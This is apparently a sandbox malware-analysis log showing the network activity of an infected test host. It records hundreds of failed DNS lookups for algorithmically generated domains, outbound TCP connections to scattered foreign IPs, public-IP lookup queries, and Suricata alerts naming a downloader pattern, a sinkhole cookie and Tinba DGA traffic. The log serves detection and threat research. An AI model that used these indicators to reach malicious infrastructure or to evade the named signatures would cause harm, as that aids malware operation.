Source: unknownDNS traffic detected: query: vjjuxotcr.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qqbnhgbsqxd.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vgpckslqq.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: bsvkxs.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vgybvjppdvve.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kiooigv.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mimmqwaykqia.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: eyngxwxvv.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: xroqdulwju.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lkqdmkckr.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ccwsnub.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: nkrqzg.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: nsnqdit.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ryxqnubutjv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qstyvuo.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kgsysa.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: rsgzts.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hzxvah.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: cceywm.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ihpimdxy.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vmasuhbokayf.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hdtuhunof.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: strpoehe.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: msrrjwyrm.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: deroocmofof.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gtpyhzzsrd.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: phwbulosja.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qodrrrzehko.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ngtlglf.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gorfnmtwasl.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pqdwhoyqfyr.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: cufjtiyoj.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qayaswom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftpehwlaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: dwpqgivmpx.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wljitkmmrsq.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: eumiqrniuuj.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hayarmmbzyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: revndeg.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: bgkwjol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pmblwd.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: cnzthi.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mwgyka.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: koqaswsiic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: teewxe.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: buzxzusv.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: bwvdpivgkbq.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kapmdmvanjh.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pznkbhqy.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: dskcygp.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: nwtltucdgxci.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wlsgkd.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: bgzsdevk.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: umwqai.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: osxpaprezyg.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: agvocmd.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: nbbghscbn.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: aqwogctkcig.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fgryrzlwv.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uugiiqomoa.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: magkesswuu.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fmpsoxtsv.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: zyzubzht.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ksqlfmrx.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: waieucykau.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: xjzmxageg.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: cobmtgsmfpx.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mbrwiditjn.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qqikyaggkswy.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: bnuclyrxygnf.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftyayhvid.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wgiusyackwya.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: zjkdtmzuul.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: tjzaiyhoayd.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: nhzkbxtuxso.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pqqobu.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gqiugkyksc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yiiemy.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mmvcfomuzgr.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: zytaxmwmimp.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: rqzbtyqilrby.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qmwoewqkaamo.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: zavcnar.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hyloumvvua.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yjhofwlx.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ffxhdkyy.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: dkxmvos.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: sfhqxtpgdcp.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wooovgmc.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lkykrcllfknb.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kscoccomsc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: zfrhqybxtdeg.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: rieoxvzxc.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: bnkqoxtw.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kzzieqwxrfgm.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: keyuqaco.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gshaoi.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pfqdbsyn.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: dkuujwkup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: rigtmebyrwk.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pfzvtdg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vtbcnjvmwj.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: tawibizuloh.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: nmubfz.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pzavkbwk.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: iaimiwaw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: euuoqg.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ybgddyiuljpt.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yumqcygsqk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wxxacjxlvl.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: cxdmdldfv.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: saxwjjjeb.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kyhbvm.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ksmggayg.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qrkcmaiuj.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedsben.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gsukcsgacuic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hosplypcd.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: delnmynibhnu.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: xofihfrimj.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: teyrdsuc.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: zuxymd.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wuhkrrpew.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ravbrdlcxepx.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lbrmhwh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wrdtfuwqu.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wcikfayz.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: dekudc.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qledvhmwtgj.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: uwpdwvsp.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: voisfho.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: rreezoiqbg.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: iogzpqtkbml.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: bflthq.info replaycode: Name error (3)
Source: unknownNetwork traffic detected: DNS query count 484
Source: unknownNetwork traffic detected: IP country count 10
Source: global trafficTCP traffic: 192.168.11.30:49817 -> 114.25.71.193:13918
Source: global trafficTCP traffic: 192.168.11.30:49826 -> 178.90.73.188:22027
Source: global trafficTCP traffic: 192.168.11.30:49832 -> 89.215.115.4:41100
Source: global trafficTCP traffic: 192.168.11.30:49840 -> 41.47.39.184:33325
Source: global trafficTCP traffic: 192.168.11.30:49849 -> 85.217.219.168:29925
Source: global trafficTCP traffic: 192.168.11.30:49858 -> 212.75.9.215:31946
Source: global trafficTCP traffic: 192.168.11.30:49874 -> 46.159.134.7:18849
Source: global trafficTCP traffic: 192.168.11.30:49881 -> 188.114.42.197:44785
Source: global trafficTCP traffic: 192.168.11.30:49891 -> 89.215.35.152:40089
Source: global trafficTCP traffic: 192.168.11.30:49908 -> 78.63.102.38:19742
Source: global trafficDNS traffic detected: number of DNS queries: 484
Source: Joe Sandbox ViewIP Address: 35.164.78.200 35.164.78.200
Source: Joe Sandbox ViewIP Address: 104.27.207.92 104.27.207.92
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknownDNS query: name: www.whatismyip.ca
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: www.showmyipaddress.com
Source: unknownDNS query: name: www.showmyipaddress.com
Source: unknownDNS query: name: www.showmyipaddress.com
Source: unknownDNS query: name: www.whatismyip.ca
Source: unknownDNS query: name: www.whatismyip.com
Source: unknownDNS query: name: www.whatismyip.ca
Source: unknownDNS query: name: www.whatismyip.ca
Source: unknownDNS query: name: www.whatismyip.ca
Source: unknownDNS query: name: www.whatismyip.com
Source: unknownDNS query: name: www.whatismyip.ca
Source: unknownDNS query: name: www.whatismyip.ca
Source: unknownDNS query: name: www.whatismyip.ca
Source: unknownDNS query: name: www.whatismyip.ca
Source: unknownDNS query: name: www.whatismyip.ca
Source: unknownDNS query: name: www.whatismyip.ca
Source: unknownDNS query: name: www.whatismyip.ca
Source: unknownDNS query: name: www.whatismyip.ca
Source: unknownDNS query: name: www.whatismyip.ca
Source: unknownDNS query: name: www.whatismyip.ca
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49833 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49799 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49833 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49799 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49800 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49804 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49800 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49804 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49820 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49820 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49803 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49803 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49814 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49814 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49813 -> 104.27.206.92:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49805 -> 104.27.206.92:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49805 -> 104.27.206.92:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49821 -> 85.214.228.140:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49810 -> 104.27.206.92:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49813 -> 104.27.206.92:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49810 -> 104.27.206.92:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49831 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49821 -> 85.214.228.140:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49815 -> 34.111.176.156:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49818 -> 35.164.78.200:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49815 -> 34.111.176.156:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49831 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49818 -> 35.164.78.200:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49819 -> 31.13.67.35:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49819 -> 31.13.67.35:80
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.11.30:49818
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.11.30:49818
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49827 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49827 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49859 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49859 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49822 -> 104.27.206.92:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49822 -> 104.27.206.92:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49825 -> 208.100.26.245:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49825 -> 208.100.26.245:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49834 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49834 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49838 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49838 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49844 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49844 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49842 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49842 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49850 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49871 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49850 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49855 -> 18.64.172.225:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49871 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49855 -> 18.64.172.225:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49856 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49856 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49843 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49843 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49851 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49851 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49853 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49853 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49861 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49861 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49882 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49882 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49875 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49867 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49875 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49867 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49880 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49880 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49848 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49848 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49905 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49905 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49887 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49877 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49887 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49877 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49901 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49901 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49889 -> 18.64.172.225:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49862 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49862 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49889 -> 18.64.172.225:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49885 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2811542 - Severity 1 - ETPRO MALWARE Possible Tinba DGA NXDOMAIN Responses (net) : 1.1.1.1:53 -> 192.168.11.30:61373
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49885 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49909 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49909 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49904 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49904 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49894 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49924 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49894 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49924 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49896 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49896 -> 104.19.223.79:80
